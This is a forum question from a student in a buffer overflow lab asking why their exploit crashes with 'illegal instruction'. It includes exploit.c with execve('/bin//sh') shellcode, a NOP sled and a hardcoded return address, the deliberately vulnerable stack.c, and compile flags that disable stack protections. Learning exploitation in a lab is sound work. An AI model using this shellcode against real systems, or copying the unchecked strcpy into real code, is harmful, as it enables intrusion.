0

We have a lab about buffer overflow. Use 'exploit.c' to write shellcode into a file called 'badfile'. Then execute 'stack' to read shellcode from badfile, but when I input ./stack, illegal instruction (core dumped) occurred. Anyone can help me to find the reason? enter image description here

/* exploit.c  */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer+0x24,"\x0b\xcf\xff\xff");
    strcpy(buffer+0x64,shellcode);
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

/* stack.c*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[24];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

And i use gcc -m32 -o stack -z execstack -fno-stack-protector stack.cto compile stack.

I use gdb debugging stack, finding after bof(), next function is the address of shellcode.

fuuuuuster
  • 1
  • 1
    Please post the result of double-checking the file after `fopen()`. Most likely the file is not accessable/existing and you are therefor using a NULL pointer. – Yunnosch Mar 25 '19 at 05:49
  • 1
    If that is not it, then please try https://ericlippert.com/2014/03/05/how-to-debug-small-programs/ https://stackoverflow.com/questions/2069367/how-to-debug-using-gdb – Yunnosch Mar 25 '19 at 05:49
  • After the program called `bof()`, it called shellcode. [badfile](https://github.com/bookchi/Img/blob/master/gdb.png?raw=true) – fuuuuuster Mar 25 '19 at 06:42
  • In GDB, you can single step assembly, and see the assembly representation for the currently executed code: `(gdb) si` and then `(gdb) x /5i $pc` – Michael Veksler Mar 25 '19 at 07:21
  • Oh, if I invoke `shellcode` directly,when it executes `int 80`, zsh will be called. [normal](https://github.com/bookchi/Img/blob/master/normal.png). But if i invoke `stack` to read `shellcode` from `badfile`, program will execute next assembly statement instead of calling zsh. [error](https://github.com/bookchi/Img/blob/master/error.png). So what might be the reason? – fuuuuuster Mar 25 '19 at 08:53

0 Answers0